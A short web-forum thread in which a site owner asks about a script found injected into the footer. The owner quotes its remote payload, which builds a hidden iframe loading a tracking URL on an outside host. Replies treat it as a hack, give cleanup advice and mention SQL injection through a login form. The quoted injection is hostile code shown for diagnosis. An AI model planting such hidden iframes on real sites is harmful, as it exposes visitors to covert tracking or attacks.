Rogue code?

I found this code in the footer of my site:

<script type="text/javascript" async="async" src="http://www.topadtackers.com/query.php"></script>

If you follow that link, it takes you to a page with this code:


<html><head></head><body>SecBanner = {                   init: function () { 			this.dodiv();	                       //document.write('<div id="SecAD" style="visibility:hidden; display:none;"></div>');                       var ad = document.createElement('iframe');                       var url = 'http://www.topadtackers.com/track.php?w=470008604&amp;sh=7297e42f430cb7404fad83e64352409c';                       ad.setAttribute('src', url);                       ad.src = url;                       ad.setAttribute('style', 'display:none; width: 0px; height 0px; border: none; visibility:hidden');                       ad.style.visibility = 'hidden';                       ad.style.display = 'none';                       var div = document.getElementById('SecAD'); 			if(div == null) { 				var div = document.getElementById('footer'); 			} 			if(div == null) { 				var div = document.getElementsByTagName('body')[0]; 			}                        div.appendChild(ad);                   }, 		dodiv: function() {                         document.write('<div id="SecAD" style="visibility:hidden; display:none;"></div>'); 		}               }               SecBanner.init();</body></html>

Any idea what that code does?

Jon,

If you didn’t put it there, the simple fact that it’s there means that you’ve been hacked. DELETE it immediately, strengthen your passwords, have your host run maldet scans (until you’re clean), then run daily scans on vulnerable files (html, php, and js at a minimum). You just don’t need hidden divs on your website which you didn’t intend and it’s not worth going through others’ code which could lead you to their websites for … well, attacks on you as a visitor.

Regards,

DK

Thanks for the recommendations.

I had this happen to my site too a couple years back. The problem in my case was that I am using dynamic content on my site. It was a SQL Insertion attack, basically any TEXT fields in my database were full of those. They did it by executing a SQL stored procedure through one of my login forms (ie, instead of a username they put a SQL escape sequence @@ that ran a stored proccedure). So if you are using dynamic content for that footer, your DB may be riddled with them. If thats the case, make sure you are are protecting against SQL insertion and run a script to clean up all the tables.